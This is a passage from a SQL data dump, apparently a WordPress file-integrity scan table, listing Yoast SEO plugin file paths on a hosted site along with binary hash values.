(':ªyY"bÏë‡ö©i­Ùè', 'wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/integrations/xmlrpc.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Â@²»ÝýŸêÑ"MÚ ', 'U–&–]æ°¥Â3£<y'',ïÃõqïg9ˆ', '', 0, '?'),
('­×@å‡ˆ_>¶é™ÊÞ', 'wp-content/plugins/wordpress-seo/src/introductions/application/ai-generate-titles-and-descriptions-introduction-upsell.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/ai-generate-titles-and-descriptions-introduction-upsell.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½N3’i`ÙMEgˆ„', 'ƒrY&ƒ‰@”2ûÎ\nÍY’µçÓ¡•\\{éñ\\]ž', '', 0, '?'),
('ý«ïÓŽ o¦„ \Zò', 'wp-content/plugins/wordpress-seo/src/introductions/application/current-page-trait.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/current-page-trait.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾ÿ´tuq!''TÚÂ\Zô9', ';’DbjC\n%«FÁÖaªiA»·\rWd¸ÐºZ', '', 0, '?'),
('hùsùq&Œ;3	—<‡', 'wp-content/plugins/wordpress-seo/src/introductions/application/introductions-collector.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/introductions-collector.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢Úô–ÉÍg¿ÐÓkÍ^‹', 'ÏÐKHéâ\\ÐÖ›wš8E{ì„Øë¹Ê¹ÂÆ¹M±bÆ', '', 0, '?'),
('ÜYjbHu¦NV9ÂªRÍñ&', 'wp-content/plugins/wordpress-seo/src/introductions/application/user-allowed-trait.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/user-allowed-trait.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'YàŽ-E€ÒDf-[pº1', 'ëóy×ÆÖ¦«M\r”*\r:ÎœûÖ´dÈwÊñ:ß® ', '', 0, '?'),
('Tnbchp\0j¶œ¸ã¥-u', 'wp-content/plugins/wordpress-seo/src/introductions/application/version-trait.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/application/version-trait.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝÈñ×´Ãêô§¨\nOÁªe', 'ÑiJÁ/Ú;š\0—­¾=ñX6±ÔÙëbr–xd0Ø¦', '', 0, '?'),
('† ~áÈŽ–\Z@®ÂÒ]', 'wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘4ï^¾™ÝÄÝpÍS', 'Ðz‰;ÓDØq·•Ãón#+N"œÄl,(»DpêºGÊŽ', '', 0, '?'),
('Ð^%Ò‰ÊÍŸÝeÒˆèŒ’Ö', 'wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-item.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/introduction-item.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÀCÒþô,\rDÔ)	ž‹\r', '¤†C# ¨ÜÌ•yîn¿bµVÃ^X	Hûb²D0Eçú˜1', '', 0, '?'),
('ÞˆûÓ“ˆHAI8êXýÑ', 'wp-content/plugins/wordpress-seo/src/introductions/domain/introductions-bucket.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/introductions-bucket.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'T«8j$P£äq`(¨Õ+Qÿ', 'ÉH‹Ãüüi´28OD‡rNØ\0 ‡kÄAÄeWÖÒmš', '', 0, '?'),
('†¹æÑÕ?n¦eTÏÁP¼', 'wp-content/plugins/wordpress-seo/src/introductions/domain/invalid-user-id-exception.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/domain/invalid-user-id-exception.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '_ù=³\\`ÍÐ÷ì[', '¥0cYp)é9|&È^±ÀÄR\r	+-«‚+ØHÒÖ', '', 0, '?'),
('ƒô}ò*âI¯ŸÒªD+.', 'wp-content/plugins/wordpress-seo/src/introductions/infrastructure/introductions-seen-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/infrastructure/introductions-seen-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '—Ê‘âóæ\n;)ž1Ô›Aw', '/Ð¤vK¨¼TÖ€%Åñ¤Ž¯9ÒÞ´q€‘3«·', '', 0, '?'),
('@Ÿ\n[”c`ÙTèáø+â', 'wp-content/plugins/wordpress-seo/src/introductions/infrastructure/wistia-embed-permission-repository.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/infrastructure/wistia-embed-permission-repository.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'j<Šæ¹ô3<Ôv¥y]', 'ŽüÇ€ž¾ÓÒè½‘…måÀá~‚åýsÉ¥”ÒEsÍ%', '', 0, '?'),
('ì˜ä"¿¨Îú1ð`!d]—', 'wp-content/plugins/wordpress-seo/src/introductions/readme.md', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/readme.md', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'o5±\Zß''¥]½*€*\0g½', 'ƒÝù¬ªá“ÕSâ''÷ûÔU\\\Z¶n#ôº¥’®<çr', '', 0, '?'),
('â«•omÅK½gÖ•¦ÊÑ\Z', 'wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-integration.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-integration.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ù›´x“$(9‰@$‚õæï', 'D;ð*`K[?Ëô5…ŠG[™…d÷¤5“BEßÁŽv', '', 0, '?'),
(';ŸžCÕ.4²£¡Æ.S<`', 'wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-seen-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/user-interface/introductions-seen-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'muUý?„lZá/˜ 9', 'ßøóe)¶ÅÜ|<š…®:-`—WŽ\\?oÂv¨QÇ\Zj§ü', '', 0, '?'),
('6xÔÿeÀPXSb&Uó•', 'wp-content/plugins/wordpress-seo/src/introductions/user-interface/wistia-embed-permission-route.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/introductions/user-interface/wistia-embed-permission-route.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'š¼wóß/É–“PGí¡„§E', 'm¿€Ãr''‡/9¦ªRj°óó\\2HûÛÊÂºYl', '', 0, '?'),
('„H	 Æ–86°ëInî', 'wp-content/plugins/wordpress-seo/src/loadable-interface.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/loadable-interface.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'J\\;¤‘TÿÿUø*­@l;', 'øc·ÀÔ¤\ZhEA–2åfÔ¾I÷ÆÆ¥xÙ-', '', 0, '?'),
('äÂ.âdFYÊGÍ´#M', 'wp-content/plugins/wordpress-seo/src/loader.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/loader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'âÛëÂ2wÎK‡Y\rœ¯¼', 'ŒaŸ{,G›¸ÁžÕ1kCR,HðÑÇ^C½ŒÞÒÁ', '', 0, '?'),
('”&?R2	XP.."ú6F', 'wp-content/plugins/wordpress-seo/src/loggers/logger.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/loggers/logger.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')	kV´¸þóÒb]Å8ÁF', 'ýÐ{óë k÷#ÜÿŽ1Ø“àÙ Ÿ÷ƒI&‚ßFìž', '', 0, '?'),
('eÿgXw„#&ú»lòl#¢', 'wp-content/plugins/wordpress-seo/src/main.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/main.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ö‹Ý‡Þ,úåH•›''', 'Ž‡—¬èkqáÞç¸±â4‚Gcz%ç\r¯7×k÷Ò°)', '', 0, '?'),
('Î€õ³-Gá*ÂÕÈD1·', 'wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/memoizers/meta-tags-context-memoizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ø@zÒeÄû,†ÄnoL', 'É''~…¯áÎøÅU:ÁÜÚÛ;ˆEq\0”òEàxbÄ\0j', '', 0, '?'),
('l	¯.ËGöhë•è¹', 'wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'lÎ4_‚ÔÞ~=.IÁÿü', 'TÄN¡¤ßE)Oõöz2.¿kÜùDCû˜¬†^9¤F', '', 0, '?'),
('”Í«5¾Ú>]ŽŠ¶ÍÅßt', 'wp-content/plugins/wordpress-seo/src/models/indexable-extension.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/indexable-extension.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'í[Àê|\0î‰$Ù3ýÁ1l0', '¡ùQŽ<•.“„0]ÛZkÝ:úÞ¸:/ÀmžœÜÝé', '', 0, '?'),
('ûu¬sU~ñY-y&Rž', 'wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/indexable-hierarchy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'DdéWñÈ¿ÝHƒzKË', 'àâeèÀ''2?•ï.Ctü''o%C 0ôXä@©?‹y­ß', '', 0, '?'),
('ÇÿªÇÜ[^¿¸©yEš¡sB', 'wp-content/plugins/wordpress-seo/src/models/indexable.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/indexable.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'P:p,‰BþÚ¯¹Mº…œç', '!§…ý*\0•£È=:`¯4‹‹‚E¢GÈ¾Ô„ÃK‘h,“t', '', 0, '?'),
('%þ¸¯](2teúÌ(£`K', 'wp-content/plugins/wordpress-seo/src/models/primary-term.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/primary-term.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬’|¨Ø¿Ãú´fP,Ï!', 'Yî ÒÐ“Ò‚`¥QØ$6GúæêOcWYGJñ«–/', '', 0, '?'),
('œ±N¥¦­û·^„JÄW°™', 'wp-content/plugins/wordpress-seo/src/models/seo-links.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/seo-links.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ò4×œsý&+Ø‹rŸÉn', 'n3Ó$C‡0w"ü.dŠ\\ô†ŠÜ”VÊ‹+h1PG/', '', 0, '?'),
('¨½–-Â"h¡Ïî¶', 'wp-content/plugins/wordpress-seo/src/models/seo-meta.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/models/seo-meta.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-„ZÀœænkxtën', 'núbz`»Iço,°‰üeæL®Ý''£ëã"Ãï2pÈ', '', 0, '?'),
('~f›“$÷0Åd9-n', 'wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/abstract-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',-ÑÊ½$1cOøi?Y', '—dXUQ3+Naòçål+Ò¾zu*èŠ*%“1\0qe', '', 0, '?'),
('ž’I/ì•ã\n	’F', 'wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/archive-adjacent-trait.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰1Å­&ïf«Æ­Äic–', '=On!Äƒ¹c†¼bè­ºÞÅì§¯õ4€"¼>%ŽÌ“', '', 0, '?'),
('ëBE‹Œ¯|$!õ¹¡5', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¡$ü;nR\ZñÕÊ‡\Z¡à>', '¡»©Ü*å1jw·Ìga<Þ½"†s¬%M®Ïßñðb‚æ', '', 0, '?'),
('@N3©0ü>²`8l¼', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-date-archive-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÿ¼^À”ª™1ðª›', '4]NÅüOW«ÁÊ\0V„Ò›ÊkÒŽv2~¥_[T[N', '', 0, '?'),
('úíçBéòïz;© ŸÄÄ', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-error-page-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!.Ÿé''øfÇ]«‰³', '–Ý¼¥^ýQ•³ià‰øê#Et.+éÜ×ÎUíë', '', 0, '?'),
('S¸ýv§Ä]ª·$Å¯åž', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-home-page-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÔÏýÍØ@;ß¡ME', '*µ\ZMlé^"8”æx*øÊêï×ŒuØÇü+ÂçÒìÅ', '', 0, '?'),
('8ÙWæë„§j—`öÁñ§', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-archive-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¿\Z²¯T½¥xsÕG„Xšà', 'øS²€h4ñ~O8uðJô«p˜Cà0˜Púž\0Û_§', '', 0, '?'),
('é,<úEÂ´&õâzeÅM', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-post-type-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’˜F3­+ÁR<ì6æ½B¬', '@É0•9Kû„ì˜ÆÂÎcaS¸ØIÎø²½Âð¥Ÿ}Z:', '', 0, '?'),
('»6ø³i¿×Z(‡qa', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’B€±ôx\nß-%@‘Ø…', 'Ò¦tÏ*AtÂfòík‰$hRˆ?ù2Ê#qYûüÜ', '', 0, '?'),
('‘8×¸}¶Í:–KÃÉÂ_ëº', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-search-result-page-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÞÁ.l±{7¾Úý2³Õl', '4¦+íâµ*/˜S+ÛÆ!båí¹†ä¢ˆêÏÅñdž’7', '', 0, '?'),
('Gi9§œ$ÇLÐ²uÊßUß¬', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-static-home-page-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ä÷6>}Ü\r+™D>Ÿ÷y', 'M•.òkü~æú_+>`=àHÏ®­2^xæE‡oÏ', '', 0, '?'),
('lÈm(fØ_q¦`bC„%t', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'SÚÏÕ˜YsÙOz1K!•ß', '‹Lt£i]V$I Fž•`ßÆ>‡s\nwaó¼Cã?o', '', 0, '?'),
('Ö5éx=ÊKD…ðìW', 'wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presentations/indexable-term-archive-presentation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¨|ÊdÉ¢,Z\\Û þ', 'ù~KF#}ï´ñ	õ\r’hòR—¾—ãœŽ\r<K', '', 0, '?'),
('ƒ4mo~"f§ñh‹ü1¸4', 'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£Jx¸ÈHÇ?h³bÎ`ösy', 'z¤Ï•ÏjÌD6Ä¤õúNR®YŽ,[VM2ûVX‘Šä=‹', '', 0, '?'),
('œ“d‘^j¼fBVÒ‰kÎ', 'wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/abstract-indexable-tag-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ':l|©©¥›øx×ŒïFs½', '/6³@óæ\Z¿?÷^ƒÃ‘!?Ê''ýCcÆÀ|Ü™O¬­$', '', 0, '?'),
('Æh(Ù²î¢&b‚«\\ek', 'wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '.ÅE	ýš¯Ùò\Zñ¸(¯', '¸4&\\<õÀ##Q³Ù•ñoöFöòÐk|‘€x', '', 0, '?'),
('ê~#Iýæ3\r_ýìÚì½Ö', 'wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/alert-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'çÎö|ôÁr’Ô¾Ô•¡5ÿ÷', '\ZÓÓ/°Z±	)DTDsŒPƒëõÕ\0O3kñMîéM', '', 0, '?'),
('_®Šmýsð*¿v''Ñü†*', 'wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/badge-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÍèâàVÈmQ»öW{³', 'Ø\Z/OE,è‰p¶¢ä8g\\ò¬ëh\\"ÚÊ5', '', 0, '?'),
('øgHµˆÂŒ¨²Úåé€œ', 'wp-content/plugins/wordpress-seo/src/presenters/admin/beta-badge-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/beta-badge-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä\nrŸÜ\nÕÜy,~Iå', '|¿V¦Ø&:5äø3úÇkÉ®ƒM«¢:’À\n·\n‚Pu', '', 0, '?'),
('H‹éÎ~{ppN)Ôè»', 'wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/help-link-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '’@[TK\nÕ´•]/ŸªšÖ', ':À’4›ðÀ_’’|K`Nˆ\r:I6¡´µoH		]º', '', 0, '?'),
('é(±ÿY9§ÉcâØ`Ô', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-error-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„asˆÑb–¶UÕÌ\\’Ì¹', '÷Èâ©Ík{RÝ«<F!¿	µoêìR,uš—_F6˜XôQ', '', 0, '?'),
('‰[•¼q|±O)0<ù®ù', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-failed-notification-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÇMõ±LMt#7‰£¹', 'E)Óiaû.Uµ+jÒ¿AÇ²4vQvxR»¡ŸóbëÑ', '', 0, '?'),
('Z}My¥R6¬±#‰`v\Zðs', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-list-item-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-list-item-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0E²¹Ìâëÿ\ZÉK­Ô~', 'GÎªy*+öƒqÀå”-¹›†°¬«''°m·û7P', '', 0, '?'),
('S“Œl¬+d{õ\0%ÊLÜ', 'wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/indexing-notification-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÙüA‡ïÚvµq©›`Ö', 'ÁhCbb"(aEÕþÛ´ómsH^ÂVSAÙ2Ä¶l', '', 0, '?'),
('Fàp¹J¡,Ïß`ndXV', 'wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/light-switch-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ž±µˆuèb1VŒÞÆIn', '-ñO)¨þªApã¸­e÷ê¨¸«Š"ßM§&œ\nzd]ß', '', 0, '?'),
('CÈàc&ú*²çpu,æ', 'wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/meta-fields-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'bƒt×:ü¦ÑÝüÙ3_Õ,', 'Q‹\rƒ2ùn®][×8Ê@ñ:{‚D®uÙµYs$Ñºž', '', 0, '?'),
('BðÂ%m‰Oj~ÌïÙ •§½', 'wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/migration-error-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3¥v·Ò»ÃKñ:Àª’', 'çµ2‘°¦ˆ"+°Ô¤ªŽå+cõhˆºr%¸3‰5E', '', 0, '?'),
('‡J÷#ï«¹#±â!LÇæ\Z', 'wp-content/plugins/wordpress-seo/src/presenters/admin/notice-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/notice-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'y’˜þÃü‚°ÍÈátá', 'Õ´K?Tî%¸µw¤5‡–"˜ž°Ù£ê´ú~>—4>', '', 0, '?'),
('4™ËŸH³<Ï3`xd', 'wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/premium-badge-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•|$J!€–v&e7²(A', '”d?«\nâ›ÝæR~•‘lU3íé…×‹Û–iÌo', '', 0, '?'),
('õº’f]Dîi›{RG˜', 'wp-content/plugins/wordpress-seo/src/presenters/admin/search-engines-discouraged-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/search-engines-discouraged-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')àŠ:-ÊMâjówËO‘', 'Jl˜\n‹Ý¨fÔqÝmêKEÒ§(D²§*1‘—', '', 0, '?'),
('ïÜ“fùÉvÅè0$ï†=3', 'wp-content/plugins/wordpress-seo/src/presenters/admin/sidebar-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/sidebar-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ' Dà1Â¬3êãÛ]²%ß', '—72­\\ÀãL''lD”8ÊžÿdPÿ>v€ ¦ç²(', '', 0, '?'),
('Œ‹”vUûGU`¦É;	+Îy', 'wp-content/plugins/wordpress-seo/src/presenters/admin/woocommerce-beta-editor-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/admin/woocommerce-beta-editor-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‘¨_·ãœHPw\në,]œR', '„¹o|-–\nWi`°qç‚s±‘xp‚ÑO¡²úEXš°ª¥Â', '', 0, '?'),
('4DØ=pg`6ËzŽè¶y', 'wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/breadcrumbs-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ëªæ#‘²ÊÞqÑWœ7R', 'öºY‹’{ÄÎå8þòè	u›.6hã¦M<R\00Ø‘3', '', 0, '?'),
('—>Ü¢ßÓ°È\Z1¡¦í=Cª', 'wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/canonical-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÅMV·òìò_†,o«v', '"½fK·‘»ÔûìCÑªv²‡Ã<4 Î¹T·Íý&i', '', 0, '?'),
(' Ã¤2ª…8ÄÙûõ«ãj', 'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/debug/marker-close-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'à‹ÍævªX˜OÀÍé#—', 'äª7á|)³h%ƒ8†E˜¾3qàÒ%¿0„š·Í', '', 0, '?'),
('#Ò)_ÌÛ±úYõ‚¡šh}2', 'wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',•rø+ŸÌþ­Ì', 'ØsS"ò—ûE!"YÎwÎ)f†—-®¬)?‡¯ÒÌ¾	', '', 0, '?'),
('‰Å_ ˜U±h»åò6,p“~', 'wp-content/plugins/wordpress-seo/src/presenters/meta-author-presenter.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/src/presenters/meta-author-presenter.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')\nÍÎ1žp"#åñ', '<óÑlE‚ÐTßl›þËîbjÖ„ç¯K]Yò Ü', '', 0, '?'),
